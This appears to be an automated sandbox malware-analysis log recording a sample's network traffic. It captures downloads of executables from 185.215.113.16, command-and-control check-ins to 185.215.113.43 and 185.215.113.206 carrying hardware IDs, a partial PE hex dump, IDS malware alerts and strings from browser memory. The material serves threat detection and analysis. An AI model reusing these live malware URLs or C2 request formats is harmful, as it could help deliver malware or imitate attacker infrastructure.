Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:26 GMTContent-Type: application/octet-streamContent-Length: 971776Last-Modified: Mon, 09 Dec 2024 21:07:21 GMTConnection: keep-aliveETag: "67575c09-ed400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 5c 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 24 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 3c ff 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 a8 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 68 01 00 00 40 0d 00 00 6a 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:33 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:46 GMTConnection: keep-aliveETag: "67575c22-2c3000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:40 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:48 GMTConnection: keep-aliveETag: "67575c24-2c3000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013536001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013537001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build"stok------HDAFBGIJKEGIECAAFHDH--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013538001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013539001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"stok------IJJKKJJDAAAAAKFHJJDG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49868 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.48.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009EE0C0 recv,recv,recv,recv, 0_2_009EE0C0
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: )) OVER (PARTITION BY fixup_url(host)) > 0https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://web-assets.toggl.com/app/assets/scripts/*.js*://pub.doubleverify.com/signals/pub.js**://connect.facebook.net/*/sdk.js**://www.everestjs.net/static/st.v3.js**://libs.coremetrics.com/eluminate.jspictureinpicture%40mozilla.org:1.0.0*://auth.9c9media.ca/auth/main.jsFileUtils_closeSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1webcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/facebook.svghttps://smartblock.firefox.etp/play.svgFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://static.chartbeat.com/js/chartbeat_video.jsFileUtils_openAtomicFileOutputStream*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://connect.facebook.net/*/all.js*@mozilla.org/network/atomic-file-output-stream;1FileUtils_openSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js*resource://gre/modules/addons/XPIProvider.jsm*://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.google-analytics.com/analytics.js**://www.googletagservices.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://pagead2.googlesyndication.com/tag/js/gpt.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://www.google-analytics.com/gtm/js**://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.vidible.tv/*/vidible-min.js**://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsWEBEXT_EVENTPAGE_IDLE_RESULT_COUNT equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php*sessionstore.resuming_after_os_restart equals www.facebook.com (Facebook)
